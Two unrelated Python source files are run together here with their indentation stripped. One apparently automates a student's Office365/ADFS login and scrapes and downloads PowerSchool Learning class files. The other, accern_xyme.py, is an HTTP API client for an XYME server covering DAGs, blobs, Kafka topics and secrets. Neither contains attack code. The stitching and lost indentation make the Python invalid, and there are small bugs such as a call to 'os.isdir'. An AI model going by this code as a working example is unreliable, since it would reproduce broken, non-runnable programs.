def __init__(self, user, redirect_to_ms=None):
"""Log in to Microsoft to initialize.
user: a ykpstools.user.User instance, the User this page belongs to,
redirect_to_ms: requests.models.Response or str, the page that a login
page redirects to for Microsoft Office365 login,
defaults to
user.get('https://login.microsoftonline.com/').
"""
super().__init__(user, redirect_to_ms)
def login(self, redirect_to_ms=None):
"""For login to Microsoft during initialization.
redirect_to_ms: requests.models.Response or str, the page that a login
page redirects to for Microsoft Office365 login,
defaults to
self.user.get('https://login.microsoftonline.com/').
"""
if redirect_to_ms is None: # Default if page not specified
redirect_to_ms = self.user.get('https://login.microsoftonline.com')
if len(redirect_to_ms.text().splitlines()) == 1:
# If already logged in
return redirect_to_ms.submit()
ms_login_CDATA = redirect_to_ms.CDATA()
ms_get_credential_type_payload = json.dumps({ # have to use json
'username': self.user.username + '@ykpaoschool.cn',
'isOtherIdpSupported': True,
'checkPhones': False,
'isRemoteNGCSupported': False,
'isCookieBannerShown': False,
'isFidoSupported': False,
'originalRequest': ms_login_CDATA['sCtx'],
'country': ms_login_CDATA['country'],
'flowToken': ms_login_CDATA['sFT'],
})
ms_get_credential_type = self.user.post(
'https://login.microsoftonline.com'
'/common/GetCredentialType?mkt=en-US',
data=ms_get_credential_type_payload
).json()
adfs_login = self.user.get(
ms_get_credential_type['Credentials']['FederationRedirectUrl'])
adfs_login_payload = adfs_login.payload(updates={
'ctl00$ContentPlaceHolder1$UsernameTextBox': self.user.username,
'ctl00$ContentPlaceHolder1$PasswordTextBox': self.user.password,
})
adfs_login_form_url = adfs_login.form().get('action')
if urlparse(adfs_login_form_url).netloc == '':
# If intermediate page exists
adfs_intermediate_url = urljoin(
'https://adfs.ykpaoschool.cn', adfs_login_form_url)
adfs_intermediate = self.user.post(adfs_intermediate_url,
data=adfs_login_payload)
adfs_intermediate_payload = adfs_intermediate.payload()
back_to_ms_url = adfs_intermediate.form().get('action')
if urlparse(back_to_ms_url).netloc == '':
# If stays in adfs, username or password is incorrect
raise WrongUsernameOrPassword
else:
# If intermediate page does not exist
back_to_ms_url = adfs_login_form_url
adfs_intermediate_payload = adfs_login_payload
ms_confirm = self.user.post(back_to_ms_url,
data=adfs_intermediate_payload)
if ms_confirm.url().netloc != 'login.microsoftonline.com':
# If ms_confirm is skipped, sometimes happens
return ms_confirm
ms_confirm_CDATA = ms_confirm.CDATA()
ms_confirm_payload = {
'LoginOptions': 0,
'ctx': ms_confirm_CDATA['sCtx'],
'hpgrequestid': ms_confirm_CDATA['sessionId'],
'flowToken': ms_confirm_CDATA['sFT'],
'canary': ms_confirm_CDATA['canary'],
'i2': None,
'i17': None,
'i18': None,
'i19': 66306,
}
ms_out_url = 'https://login.microsoftonline.com/kmsi'
ms_out = self.user.post(ms_out_url, data=ms_confirm_payload)
if ms_out_url in ms_out.url().geturl():
# If encounters 'Working...' page
return ms_out.submit()
else:
return ms_out
class PowerschoolLearningPage(LoginPageBase):
"""Class 'PowerschoolLearningPage' inherits and adds on specific
initialization and attributes for Powerschool Learning to
'ykpstools.page.Page'.
"""
def __init__(self, user):
"""Log in to Powerschool Learning to initialize.
user: a ykpstools.user.User instance, the User this page belongs to.
"""
super().__init__(user)
def login(self):
"""For login to Powerschool Learning during initialization."""
psl_login = self.user.get(urljoin(
'https://ykpaoschool.learning.powerschool.com',
'/do/oauth2/office365_login'))
if psl_login.url().netloc == 'ykpaoschool.learning.powerschool.com':
# If already logged in
return psl_login
else:
return self.user.microsoft(psl_login)
def _append_class(self, link, i):
"""Internal function. Append a class to self._classes."""
response = self.user.get(link)
self._classes[i] = self.Class(self.user, response)
def get_classes(self, max_threads=None, from_cache=True):
"""The 'get_classes' property parses and returns a list of
self.Class by GET'ing and caching all classes asynchronously.
max_threads: int or None, the maximum number of threads running at a
time. None means no restriction, defaults to None.
from_cache: whether to load classes from cache, defaults to True.
"""
if not hasattr(self, '_classes') or not from_cache:
divs = self.soup().find_all('div', class_='eclass_filter')
self._classes = [None] * len(divs)
threads = []
for i, div in enumerate(divs):
link = urljoin(self.url().geturl(), div.find('a').get('href'))
threads.append(threading.Thread(
target=self._append_class, args=(link, i)))
if max_threads is not None:
if len(threads) >= max_threads:
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threads = []
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return self._classes
class Class(Page):
"""Class 'Class' is an attribute of PowerschoolLearningPage and an
abstraction of a class found in Powerschool Learning.
"""
@property
def name(self):
return self.soup().find(
'h1', id='cms_page_eclass_name').get_text(strip=True)
@staticmethod
def ensure_directory(directory):
"""os.makedirs(directory) if directory doesn't exist."""
try:
os.makedirs(directory)
except FileExistsError:
if not os.isdir(directory):
raise
# TODO, finish all this mess
def download_all_to(self, directory='.', max_threads=None,
from_cache=True, blocking=False):
"""Download all downloadable files in this Class asynchronously,
chached.
directory: str, directory to download to, defaults to '.',
max_threads: int or None, the maximum number of threads running at
a time. None means no restriction, defaults to None,
from_cache: whether to load classes from cache, defaults to True.
"""
for topic in self.get_topics(max_threads, from_cache):
for subtopic in self.get_subtopics_from_topic(topic):
names_to_downloads = self.get_names_to_downloads(subtopic)
if names_to_downloads == {}:
continue
download_directory = os.path.join(
os.path.abspath(directory),
self.get_topic_name(topic),
self.get_subtopic_name(subtopic))
self.ensure_directory(download_directory)
for name in names_to_downloads:
download_content = self.user.get(
names_to_downloads[name]).response.content
file_directory = os.path.join(download_directory, name)
with open(file_directory, 'wb') as file:
file.write(download_content)
def _append_topic(self, link, i):
"""Internal function. Append a topic soup to self._topics."""
soup = self.user.get(link).soup()
self._topics[i] = soup
def get_topics(self, max_threads=None, from_cache=True):
"""Get all topics, in soups.
max_threads: int or None, the maximum number of threads running at
a time. None means no restriction, defaults to None.
from_cache: whether to load classes from cache, defaults to True.
"""
if not hasattr(self, '_topics') or not from_cache:
as_ = self.soup().find_all('a', id=re.compile(r'plink_\d+'))
self._topics = [None] * len(as_)
threads = []
for i, a in enumerate(as_):
link = urljoin(self.url().geturl(), a.get('href'))
threads.append(threading.Thread(
target=self._append_topic, args=(link, i)))
if max_threads is not None:
if len(threads) >= max_threads:
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threads = []
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return self._topics
def get_subtopics_from_topic(self, topic):
return topic.find_all('div',
id=re.compile(r'box_\d+'), class_=['cms_box', 'cms_box_file'])
def get_names_to_downloads(self, subtopic):
download_elements = subtopic.find_all('a',
attrs={'data-event-action': 'download'})
names_to_downloads = {
a.string: urljoin(self.url().geturl(), a.get('href'))
for a in download_elements}
return names_to_downloads
def get_topic_name(self, topic):
add_selected_js = topic.find('script', type='text/javascript',
text=re.compile(r'sidebarSel\(\d+\);')).string
selected_id = re.findall(
r'sidebarSel\((\d+)\);', add_selected_js)[0]
return topic.find('a', id='plink_{}'.format(selected_id)).string
def get_subtopic_name(self, subtopic):
return subtopic.find('span', class_='box_title').string
|
accern_xyme.py
|
from typing import (
Any,
Callable,
cast,
Dict,
IO,
Iterable,
Iterator,
List,
Optional,
overload,
Set,
TextIO,
Tuple,
TYPE_CHECKING,
Union,
)
import io
import os
import pickle
import sys
import json
import time
import weakref
import inspect
import textwrap
import threading
import contextlib
from io import BytesIO, StringIO
from urllib.parse import urlparse, urlunparse
from pathlib import PosixPath, PurePath
from graphviz.backend import ExecutableNotFound
import pandas as pd
import requests
from requests import Response
from requests.exceptions import HTTPError, RequestException
from typing_extensions import Literal
import quick_server
from .util import (
async_compute,
ByteResponse,
content_to_csv_bytes,
df_to_csv_bytes,
get_age,
get_file_hash,
get_file_upload_chunk_size,
get_max_retry,
get_progress_bar,
get_retry_sleep,
has_graph_easy,
interpret_ctype,
is_jupyter,
maybe_json_loads,
merge_ctype,
safe_opt_num,
ServerSideError,
to_bool,
)
from .types import (
AllowedCustomImports,
BlobFilesResponse,
BlobInit,
BlobOwner,
BlobTypeResponse,
BlobURIResponse,
CacheStats,
CopyBlob,
DagCreate,
DagDef,
DagDupResponse,
DagInfo,
DagInit,
DagList,
DagPrettyNode,
DagReload,
DagStatus,
DeleteBlobResponse,
DynamicResults,
DynamicStatusResponse,
ESQueryResponse,
FlushAllQueuesResponse,
InCursors,
InstanceStatus,
JSONBlobAppendResponse,
KafkaGroup,
KafkaMessage,
KafkaOffsets,
KafkaThroughput,
KafkaTopicNames,
KafkaTopics,
KnownBlobs,
MinimalQueueStatsResponse,
ModelInfo,
ModelParamsResponse,
ModelReleaseResponse,
ModelVersionResponse,
NamespaceList,
NamespaceUpdateSettings,
NodeChunk,
NodeCustomCode,
NodeCustomImports,
NodeDef,
NodeDefInfo,
NodeInfo,
NodeState,
NodeStatus,
NodeTiming,
NodeTypeResponse,
NodeTypes,
NodeUserColumnsResponse,
PrettyResponse,
PutNodeBlob,
QueueMode,
QueueStatsResponse,
QueueStatus,
ReadNode,
S3Config,
SetNamedSecret,
SettingsObj,
TaskStatus,
Timing,
TimingResult,
Timings,
TritonModelsResponse,
UploadFilesResponse,
UUIDResponse,
VersionResponse,
WorkerScale,
)
if TYPE_CHECKING:
WVD = weakref.WeakValueDictionary[str, 'DagHandle']
else:
WVD = weakref.WeakValueDictionary
API_VERSION = 4
DEFAULT_URL = "http://localhost:8080"
DEFAULT_NAMESPACE = "default"
METHOD_DELETE = "DELETE"
METHOD_FILE = "FILE"
METHOD_GET = "GET"
METHOD_LONGPOST = "LONGPOST"
METHOD_POST = "POST"
METHOD_PUT = "PUT"
PREFIX = "/xyme"
INPUT_CSV_EXT = ".csv"
INPUT_TSV_EXT = ".tsv"
INPUT_ZIP_EXT = ".zip"
INPUT_EXT = [INPUT_ZIP_EXT, INPUT_CSV_EXT, INPUT_TSV_EXT]
FUNC = Callable[..., Any]
CUSTOM_NODE_TYPES = {
"custom_data",
"custom_json",
"custom_json_to_data",
"custom_json_join_data",
}
NO_RETRY = [METHOD_POST, METHOD_FILE]
class AccessDenied(Exception):
pass
# *** AccessDenied ***
class LegacyVersion(Exception):
def __init__(self, api_version: int) -> None:
super().__init__(f"expected {API_VERSION} got {api_version}")
self._api_version = api_version
def get_api_version(self) -> int:
return self._api_version
# *** LegacyVersion ***
class XYMEClient:
def __init__(
self,
url: str,
token: Optional[str],
namespace: str) -> None:
self._url = url.rstrip("/")
if token is None:
token = os.environ.get("XYME_SERVER_TOKEN")
self._token = token
self._namespace = namespace
self._last_action = time.monotonic()
self._auto_refresh = True
self._dag_cache: WVD = weakref.WeakValueDictionary()
self._node_defs: Optional[Dict[str, NodeDefInfo]] = None
def get_version() -> int:
server_version = self.get_server_version()
try:
return int(server_version["api_version"])
except (ValueError, KeyError) as e:
raise LegacyVersion(1) from e
api_version = get_version()
if api_version < API_VERSION:
raise LegacyVersion(api_version)
self._api_version = api_version
def get_api_version(self) -> int:
return self._api_version
def set_auto_refresh(self, is_auto_refresh: bool) -> None:
self._auto_refresh = is_auto_refresh
def is_auto_refresh(self) -> bool:
return self._auto_refresh
def refresh(self) -> None:
self._node_defs = None
def _maybe_refresh(self) -> None:
if self.is_auto_refresh():
self.refresh()
# FIXME: Do we still need this?
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
old_refresh = self.is_auto_refresh()
try:
self.set_auto_refresh(False)
yield old_refresh
finally:
self.set_auto_refresh(old_refresh)
def _raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]] = None,
add_prefix: bool = True,
add_namespace: bool = True,
api_version: Optional[int] = None) -> Tuple[BytesIO, str]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_bytes(
method,
path,
args,
files,
add_prefix,
add_namespace,
api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
if not reset_files():
raise
if method in NO_RETRY:
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_str(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
add_namespace: bool = True,
api_version: Optional[int] = None) -> TextIO:
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_str(
method,
path,
args,
add_prefix,
add_namespace,
api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if method in NO_RETRY:
raise
if retry >= max_retry:
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
add_namespace: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_json(
method,
path,
args,
add_prefix,
add_namespace,
files,
api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
if not reset_files():
raise
if method in NO_RETRY:
raise
time.sleep(get_retry_sleep())
retry += 1
def _fallible_raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]],
add_prefix: bool,
add_namespace: bool,
api_version: Optional[int]) -> Tuple[BytesIO, str]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
if add_namespace:
args["namespace"] = self._namespace
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
# NOTE: no content type check -- will be handled by interpret_ctype
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(
url,
data=args,
files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
},
headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_str(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
add_namespace: bool,
api_version: Optional[int]) -> TextIO:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
if add_namespace:
args["namespace"] = self._namespace
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
if req.headers["content-type"] == "application/problem+json":
raise ServerSideError(json.loads(req.text)["errMessage"])
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return StringIO(req.text)
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return StringIO(req.text)
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
add_namespace: bool,
files: Optional[Dict[str, IO[bytes]]],
api_version: Optional[int]) -> Dict[str, Any]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
if add_namespace:
args["namespace"] = self._namespace
if method != METHOD_FILE and files is not None:
raise ValueError(
f"files are only allow for post (got {method}): {files}")
req = None
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
if req.headers["content-type"] == "application/problem+json":
raise ServerSideError(json.loads(req.text)["errMessage"])
try:
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(
url,
data=args,
files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
},
headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_PUT:
req = requests.put(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_DELETE:
req = requests.delete(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_LONGPOST:
args["token"] = self._token
try:
res = quick_server.worker_request(url, args)
if "errMessage" in res:
raise ServerSideError(res["errMessage"])
return res
except quick_server.WorkerError as e:
if e.get_status_code() == 403:
raise AccessDenied(e.args) from e
raise e
raise ValueError(f"unknown method {method}")
except json.decoder.JSONDecodeError as e:
if req is None:
raise
raise ValueError(req.text) from e
def request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]] = None,
add_prefix: bool = True,
add_namespace: bool = True,
api_version: Optional[int] = None) -> Tuple[BytesIO, str]:
return self._raw_request_bytes(
method, path, args, files, add_prefix, add_namespace, api_version)
def request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
add_namespace: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
return self._raw_request_json(
method, path, args, add_prefix, add_namespace, files, api_version)
def get_server_version(self) -> VersionResponse:
return cast(VersionResponse, self.request_json(
METHOD_GET,
f"{PREFIX}/v{API_VERSION}/version",
{},
add_prefix=False,
add_namespace=False))
def get_namespaces(self) -> List[str]:
return cast(NamespaceList, self.request_json(
METHOD_GET, "/namespaces", {}))["namespaces"]
def get_dags(self) -> List[str]:
return [
res["dag"]
for res in self.get_dag_times(retrieve_times=False)[1]
]
def get_dag_ages(self) -> List[Dict[str, Optional[str]]]:
cur_time, dags = self.get_dag_times(retrieve_times=True)
return [
{
"config_error": dag_status["config_error"],
"created": get_age(cur_time, dag_status["created"]),
"dag": dag_status["dag"],
"deleted": get_age(cur_time, dag_status["deleted"]),
"latest": get_age(cur_time, dag_status["latest"]),
"oldest": get_age(cur_time, dag_status["oldest"]),
}
for dag_status in sorted(dags, key=lambda el: (
el["config_error"] is None,
safe_opt_num(el["oldest"]),
safe_opt_num(el["latest"]),
el["dag"]))
]
def get_dag_times(self, retrieve_times: bool = True) -> Tuple[
float, List[DagStatus]]:
res = cast(DagList, self.request_json(
METHOD_GET, "/dags", {
"retrieve_times": int(retrieve_times),
}))
return res["cur_time"], res["dags"]
def get_dag(self, dag_uri: str) -> 'DagHandle':
res = self._dag_cache.get(dag_uri)
if res is not None:
return res
res = DagHandle(self, dag_uri)
self._dag_cache[dag_uri] = res
return res
def get_blob_handle(self, uri: str, is_full: bool = False) -> 'BlobHandle':
return BlobHandle(self, uri, is_full=is_full)
def get_node_defs(self) -> Dict[str, NodeDefInfo]:
self._maybe_refresh()
if self._node_defs is not None:
return self._node_defs
res = cast(NodeTypes, self.request_json(
METHOD_GET, "/node_types", {}, add_namespace=False))["info"]
self._node_defs = res
return res
def create_new_blob(self, blob_type: str) -> str:
return cast(BlobInit, self.request_json(
METHOD_POST, "/blob_init", {
"type": blob_type,
}, add_namespace=False))["blob"]
def get_blob_owner(self, blob_uri: str) -> BlobOwner:
return cast(BlobOwner, self.request_json(
METHOD_GET, "/blob_owner", {
"blob": blob_uri,
}))
def set_blob_owner(
self,
blob_uri: str,
dag_id: Optional[str] = None,
node_id: Optional[str] = None,
external_owner: bool = False) -> BlobOwner:
return cast(BlobOwner, self.request_json(
METHOD_PUT, "/blob_owner", {
"blob": blob_uri,
"owner_dag": dag_id,
"owner_node": node_id,
"external_owner": external_owner,
}))
def create_new_dag(
self,
username: Optional[str] = None,
dagname: Optional[str] = None,
index: Optional[int] = None) -> str:
return cast(DagInit, self.request_json(
METHOD_POST, "/dag_init", {
"user": username,
"name": dagname,
"index": index,
}))["dag"]
def get_blob_type(self, blob_uri: str) -> BlobTypeResponse:
return cast(BlobTypeResponse, self.request_json(
METHOD_GET, "/blob_type", {
"blob_uri": blob_uri,
},
))
def get_csv_blob(self, blob_uri: str) -> 'CSVBlobHandle':
blob_type = self.get_blob_type(blob_uri)
if not blob_type["is_csv"]:
raise ValueError(f"blob: {blob_uri} is not csv type")
return CSVBlobHandle(self, blob_uri, is_full=False)
def get_custom_code_blob(self, blob_uri: str) -> 'CustomCodeBlobHandle':
blob_type = self.get_blob_type(blob_uri)
if not blob_type["is_custom_code"]:
raise ValueError(f"blob: {blob_uri} is not custom code type")
return CustomCodeBlobHandle(self, blob_uri, is_full=False)
def get_json_blob(self, blob_uri: str) -> 'JSONBlobHandle':
blob_type = self.get_blob_type(blob_uri)
if not blob_type["is_json"]:
raise ValueError(f"blob: {blob_uri} is not json type")
return JSONBlobHandle(self, blob_uri, is_full=False)
def duplicate_dag(
self,
dag_uri: str,
dest_uri: Optional[str] = None,
copy_nonowned_blobs: Optional[bool] = None,
retain_nonowned_blobs: bool = False,
warnings_io: Optional[IO[Any]] = sys.stderr) -> str:
if copy_nonowned_blobs is None:
copy_nonowned_blobs = not retain_nonowned_blobs
elif warnings_io is not None:
warnings_io.write(
"copy_nonowned_blobs is deprecated; "
"use retain_nonowned_blobs instead\n")
warnings_io.flush()
# FIXME: !!!xyme-backend bug!!!
copy_nonowned_blobs = not copy_nonowned_blobs
args = {
"dag": dag_uri,
"copy_nonowned_blobs": copy_nonowned_blobs,
}
if dest_uri is not None:
args["dest"] = dest_uri
return cast(DagDupResponse, self.request_json(
METHOD_POST, "/dag_dup", args))["dag"]
def set_dag(
self,
dag_uri: str,
defs: DagDef,
warnings_io: Optional[IO[Any]] = sys.stderr) -> 'DagHandle':
dag_create = cast(DagCreate, self.request_json(
METHOD_POST, "/dag_create", {
"dag": dag_uri,
"defs": defs,
}))
dag_uri = dag_create["dag"]
if warnings_io is not None:
warnings = dag_create["warnings"]
if len(warnings) > 1:
warnings_io.write(
f"{len(warnings)} warnings while "
f"setting dag {dag_uri}:\n")
elif len(warnings) == 1:
warnings_io.write(
f"Warning while setting dag {dag_uri}:\n")
for warn in warnings:
warnings_io.write(f"{warn}\n")
if warnings:
warnings_io.flush()
return self.get_dag(dag_uri)
def set_settings(
self, config_token: str, settings: SettingsObj) -> SettingsObj:
return cast(NamespaceUpdateSettings, self.request_json(
METHOD_POST, "/settings", {
"settings": settings,
"config_token": config_token,
}))["settings"]
def get_settings(self) -> SettingsObj:
return cast(NamespaceUpdateSettings, self.request_json(
METHOD_GET, "/settings", {}))["settings"]
def get_allowed_custom_imports(self) -> AllowedCustomImports:
return cast(AllowedCustomImports, self.request_json(
METHOD_GET, "/allowed_custom_imports", {}, add_namespace=False))
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
dag: Optional[str],
minimal: Literal[True]) -> MinimalQueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
dag: Optional[str],
minimal: Literal[False]) -> QueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
dag: Optional[str],
minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
...
def check_queue_stats(
self,
dag: Optional[str] = None,
minimal: bool = False) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
if minimal:
return cast(MinimalQueueStatsResponse, self.request_json(
METHOD_GET, "/queue_stats", {
"dag": dag,
"minimal": True,
}))
return cast(QueueStatsResponse, self.request_json(
METHOD_GET, "/queue_stats", {
"dag": dag,
"minimal": False,
}))
def get_instance_status(
self,
dag_uri: Optional[str] = None,
node_id: Optional[str] = None) -> Dict[InstanceStatus, int]:
return cast(Dict[InstanceStatus, int], self.request_json(
METHOD_GET, "/instance_status", {
"dag": dag_uri,
"node": node_id,
}))
def get_queue_mode(self) -> str:
return cast(QueueMode, self.request_json(
METHOD_GET, "/queue_mode", {}, add_namespace=False))["mode"]
def set_queue_mode(self, mode: str) -> str:
return cast(QueueMode, self.request_json(
METHOD_PUT, "/queue_mode", {
"mode": mode,
}, add_namespace=False))["mode"]
def flush_all_queue_data(self) -> None:
def do_flush() -> bool:
res = cast(FlushAllQueuesResponse, self.request_json(
METHOD_POST, "/flush_all_queues", {}, add_namespace=False))
return bool(res["success"])
while do_flush(): # we flush until there is nothing to flush anymore
time.sleep(1.0)
def get_cache_stats(self) -> CacheStats:
return cast(CacheStats, self.request_json(
METHOD_GET, "/cache_stats", {}, add_namespace=False))
def reset_cache(self) -> CacheStats:
return cast(CacheStats, self.request_json(
METHOD_POST, "/cache_reset", {}, add_namespace=False))
def create_kafka_error_topic(self) -> KafkaTopics:
return cast(KafkaTopics, self.request_json(
METHOD_POST, "/kafka_topics", {
"num_partitions": 1,
}))
def get_kafka_error_topic(self) -> str:
res = cast(KafkaTopicNames, self.request_json(
METHOD_GET, "/kafka_topic_names", {}))["error"]
assert res is not None
return res
def delete_kafka_error_topic(self) -> KafkaTopics:
return cast(KafkaTopics, self.request_json(
METHOD_POST, "/kafka_topics", {
"num_partitions": 0,
}))
def read_kafka_errors(self, offset: str = "current") -> List[str]:
return cast(List[str], self.request_json(
METHOD_GET, "/kafka_msg", {
"offset": offset,
}))
def get_named_secrets(
self,
config_token: Optional[str] = None,
show_values: bool = False) -> Dict[str, Optional[str]]:
if show_values and config_token is None:
raise ValueError("config_token must be set to show_values")
return cast(Dict[str, Optional[str]], self.request_json(
METHOD_GET, "/named_secrets", {
"show": int(bool(show_values)),
"config_token": config_token,
}))
def set_named_secret(
self, config_token: str, key: str, value: str) -> bool:
return cast(SetNamedSecret, self.request_json(
METHOD_PUT, "/named_secrets", {
"key": key,
"value": value,
"config_token": config_token,
}))["replaced"]
def get_error_logs(self) -> str:
with self._raw_request_str(METHOD_GET, "/error_logs", {}) as fin:
return fin.read()
def get_known_blobs(
self,
blob_type: Optional[str] = None,
connector: Optional[str] = None) -> List[str]:
return [
res[0]
for res in self.get_known_blob_times(
retrieve_times=False,
blob_type=blob_type,
connector=connector)[1]
]
def get_known_blob_ages(
self,
blob_type: Optional[str] = None,
connector: Optional[str] = None) -> List[Tuple[str, str]]:
cur_time, blobs = self.get_known_blob_times(
retrieve_times=True, blob_type=blob_type, connector=connector)
return [
(blob_id, get_age(cur_time, blob_time))
for (blob_id, blob_time) in sorted(blobs, key=lambda el: (
safe_opt_num(el[1]), el[0]))
]
def get_known_blob_times(
self,
retrieve_times: bool,
blob_type: Optional[str] = None,
connector: Optional[str] = None,
) -> Tuple[float, List[Tuple[str, Optional[float]]]]:
obj: Dict[str, Union[int, str]] = {
"retrieve_times": int(retrieve_times),
}
if blob_type is not None:
obj["blob_type"] = blob_type
if connector is not None:
obj["connector"] = connector
res = cast(KnownBlobs, self.request_json(
METHOD_GET, "/known_blobs", obj))
return res["cur_time"], res["blobs"]
def get_triton_models(self) -> List[str]:
return cast(TritonModelsResponse, self.request_json(
METHOD_GET, "/inference_models", {}))["models"]
@staticmethod
def read_dvc(
path: str,
repo: str,
rev: Optional[str] = "HEAD",
warnings_io: Optional[IO[Any]] = sys.stderr) -> Any:
"""Reading dvc file content from git tracked DVC project.
Args:
path (str):
File path to read, relative to the root of the repo.
repo (str):
specifies the location of the DVC project. It can be a
github URL or a file system path.
rev (str):
Git commit (any revision such as a branch or tag name, or a
commit hash). If repo is not a Git repo, this option is
ignored. Default: HEAD.
warnings_io (optional IO):
IO stream where the warning will be printed to
Returns:
the content of the file.
"""
from .util import has_dvc
if not has_dvc():
if warnings_io is not None:
warnings_io.write(
"Please install dvc https://dvc.org/doc/install")
return None
import dvc.api
res = dvc.api.read(path, repo=repo, rev=rev, mode="r")
maybe_parse = maybe_json_loads(res)
if maybe_parse is not None:
return maybe_parse
return res
@staticmethod
def get_env_str(key: str, default: Optional[str] = None) -> str:
res = os.getenv(key, default=default)
if res is None:
raise ValueError(f"environment variable {key} is not set")
return f"{res}"
@staticmethod
def get_env_int(key: str, default: Optional[int] = None) -> int:
res = os.getenv(key, default=default)
if res is None:
raise ValueError(f"environment variable {key} is not set")
return int(res)
@staticmethod
def get_env_bool(key: str, default: Optional[bool] = None) -> bool:
res = os.getenv(key, default=default)
if res is None:
raise ValueError(f"environment variable {key} is not set")
return to_bool(res)
@staticmethod
def load_json(json_path: str) -> Dict[str, Any]:
with open(json_path, "r") as fin:
return json.load(fin)
@classmethod
def load_s3_config(cls, config_path: str) -> S3Config:
return cast(S3Config, cls.load_json(config_path))
@classmethod
def download_s3_from_file(
cls, dest_path: List[str], config_path: str) -> None:
cls.download_s3(dest_path, cls.load_s3_config(config_path))
@staticmethod
def download_s3(dest_path: List[str], config: S3Config) -> None:
import boto3
s3 = boto3.client(
"s3",
aws_access_key_id=config["accern_aws_key"],
aws_secret_access_key=config["accern_aws_access_key"])
assert len(dest_path) == len(config["model_download_path"])
for (dest, path) in zip(dest_path, config["model_download_path"]):
s3.download_file(config["model_download_bucket"], path, dest)
def get_uuid(self) -> str:
return cast(UUIDResponse, self.request_json(
METHOD_GET, "/uuid", {}))["uuid"]
def delete_blobs(self, blob_uris: List[str]) -> DeleteBlobResponse:
return cast(DeleteBlobResponse, self.request_json(
METHOD_DELETE, "/blob", {
"blob_uris": blob_uris,
},
))
# *** XYMEClient ***
